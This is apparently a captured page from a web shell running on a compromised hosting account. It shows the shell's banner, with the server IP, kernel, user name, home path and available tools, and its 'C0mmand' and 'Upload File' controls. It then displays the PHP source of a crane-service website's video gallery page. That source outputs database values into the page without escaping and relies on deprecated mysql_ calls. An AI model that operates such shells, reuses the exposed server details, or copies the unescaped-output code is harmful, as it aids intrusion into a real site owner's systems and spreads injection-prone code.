Server IP : 103.53.40.154 / Your IP : 3.144.25.248 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/sainicraneservice.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("site-header.php");?> <!-- =-=-=-=-=-=-= HEADER END =-=-=-=-=-=-= --> <!-- =-=-=-=-=-=-= INNER FLASH =-=-=-=-=-=-= --> <?php include("site-header-flash-inner.php");?> <!-- =-=-=-=-=-=-= INNER FLASH END =-=-=-=-=-=-= --> <!-- =-=-=-=-=-=-= Gallery =-=-=-=-=-=-= --> <section id="gallery" class="custom-padding"> <div class="container"> <?php $sql_videos=db_query("select * from tbl_video where 1 order by video_id asc"); if(mysql_num_rows($sql_videos) >0){ while($VIDEOS_DATA=mysql_fetch_array($sql_videos)){ @extract($VIDEOS_DATA); ?> <div class="col-md-4" style="margin-top:50px;"> <iframe width="100%" height="200" src="http://www.youtube.com/embed/<?=$VIDEOS_DATA['video_clip']?>" frameborder="0" allowfullscreen></iframe> <div class="content" style="background:#DFDFDF; padding:7px;"> <h4 style="color:#000000;"><?=$VIDEOS_DATA['video_title']?></h4> </div> </div> <? }} ?> <!-- portfolio-container --> </div> <!-- end container --> </section> <!-- =-=-=-=-=-=-= Blog & News end =-=-=-=-=-=-= --> <!-- =-=-=-=-=-=-= Call To Action =-=-=-=-=-=-= --> <div class="parallex-small "> <div class="container"> <div class="row custom-padding-20 "> <div class="col-md-8 col-sm-8"> <div class="parallex-text"> <h4>Not sure which solution fits you business needs?</h4> </div> <!-- end subsection-text --> </div> <!-- end col-md-8 --> <div class="col-md-4 col-sm-4"> <div class="parallex-button"> <a href="<?=$site_url?>/enquiry.html" class="btn btn-lg btn-clean">Get a quote <i class="fa fa-angle-double-right "></i></a> </div> <!-- end parallex-button --> </div> <!-- end col-md-4 --> </div> <!-- end row --> </div> <!-- end container --> </div> <!-- =-=-=-=-=-=-= Call To Action End =-=-=-=-=-=-= --> <!-- =-=-=-=-=-=-= FOOTER =-=-=-=-=-=-= --> <?php include("site-footer.php");?>